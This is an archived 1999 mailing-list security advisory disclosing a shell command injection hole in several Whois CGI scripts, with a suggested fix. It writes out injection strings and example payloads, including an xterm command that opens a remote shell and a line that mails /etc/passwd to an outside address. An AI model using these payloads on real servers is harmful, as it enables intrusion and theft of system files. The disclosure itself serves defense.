Whois.cgi - ADVISORY.

From: Cody T. - hhp (hhpat_private)
Date: Tue Nov 09 1999 - 18:51:58 PST

Previous message: Mnemonix: "Re: Local user can fool another to run executable. .CNT/.GID/.HLP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  (hhp) Whois.CGI - ADVISORY. (hhp)
              hhp-ADV#12
         11/9/99 8:42:57pm CST
             By: loophole
 hhpat_private - http://hhp.perlx.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What?:
Hole  in  several  known/unknown Whois CGI
packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Versions?:
1.) Whois Internic Lookup - version: 1.0
2.) CC Whois              - Version: 1.0
3.) Matt's Whois          - Version: 1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit!:
These versions allow execution of commands
due  to  lack  of  shell  escape character
parsing  if  the domain entries consist of
one of the following strings...
Note: (Strings  will  vary  for different
vulnerable versions.)

1.) ;commands
2.) ";commands
3.) ;commands;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Example!:
If the domain entries consist of:
1.) ;id
2.) ";id
or either,
3.) ;id;
you will see something like this:
'Whois Server Version 1.1

Domain names in the .com, .net, and .org
domains  can now be registered with many
different  competing  registrars.  Go to
http://www.internic.net for detailed
information. etc. etc. etc....
(scroll  to  the  bottom of the output.)
uid=501(blah) gid=500(blah)'
^^^^^\
      ` 'id' was executed on the server.

Other example commands can be ran also...
;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail youat_private;
Etc, Etc.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Foo!:
     Alot of main *NIC* servers were found
running  vulnerable versions.  I am in the
process  of  contacting  the main servers,
and the software programmers to advise the
vulnerability.

     Very   well   known/used   sites  are
vulnerable (Which will rename nameless for
security  reasons).  I  tried  to  get  in
contact  with  them,  but being such a big
company/service,  I failed, so sad indeed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fix?:
     If  you run one of these bad scripts,
delete  it  and  point  your  browser  to:
http://cgi.resourceindex.com/Programs_and_
Scripts/Perl/Internet_Utilities/Whois/
and download one of the secure packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shouts to all of hhp.
Fuck you to gH for trying to rip this ADV
before I could release it.
---hhp-2t0--------------------------------

Previous message: Mnemonix: "Re: Local user can fool another to run executable. .CNT/.GID/.HLP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:19:38 PDT